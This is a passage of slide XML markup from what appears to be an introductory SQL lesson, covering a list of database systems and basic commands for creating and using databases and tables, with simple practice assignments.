            <a:ext cx="4010700" cy="3511200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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Clr>
                <a:srgbClr val="9900FF"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="9900FF"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MariaDB</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="9900FF"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostGres</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="9900F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Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Server</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Oracle Database</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SQLite</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2683" name="Google Shape;2683;p436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4715275" y="1096375"/>
            <a:ext cx="4010700" cy="3511200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IBM DB2</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Amazon Aurora</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Microsoft MS Access</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Sybase</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Infomix</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRP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7" name="Shape 2687"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2688" name="Google Shape;2688;p437"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to create database?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2689" name="Google Shape;2689;p437"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765450" y="1690250"/>
            <a:ext cx="81675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3500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create database &lt;DatabaseName&gt;;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Create database a_db;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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3" name="Shape 2693"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2694" name="Google Shape;2694;p438"/>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How to go inside database?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2695" name="Google Shape;2695;p438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769500" y="1725450"/>
            <a:ext cx="76050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3500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;DatabaseName&gt;;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	use a_db;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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439"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>How to create a table in database?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2701" name="Google Shape;2701;p439"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765450" y="1918850"/>
            <a:ext cx="79485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200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create table &lt;tableName&gt; (</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	columnName1   dataType   constraintName,</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columnName2   dataType   constraintName</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…..</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2706" name="Google Shape;2706;p440"/>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How to display the tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2707" name="Google Shape;2707;p440"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1693250" y="1704600"/>
            <a:ext cx="4086300" cy="2247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3800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show tables;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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1" name="Shape 2711"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2712" name="Google Shape;2712;p441"/>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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to display the structure of  tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2713" name="Google Shape;2713;p441"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886200" y="1761200"/>
            <a:ext cx="55272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900">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>describe &lt;tableName&gt;;</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	desc &lt;tableName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	explain &lt;tableName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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7" name="Shape 2717"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2718" name="Google Shape;2718;p442"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3812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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2719" name="Google Shape;2719;p442"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459000" y="1096375"/>
            <a:ext cx="7877400" cy="3511200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create databases from a_db to z_db;</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Show database that is created.</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Create tables from a_tbl to z_tbl</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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p443"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3812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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2725" name="Google Shape;2725;p443"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459000" y="1096375"/>
            <a:ext cx="7877400" cy="3511200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_db</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A_tbl</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b_db</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b_tbl</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>z_db   -&gt;  z_tbl</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="389325"/>
            <a:ext cx="875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320">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
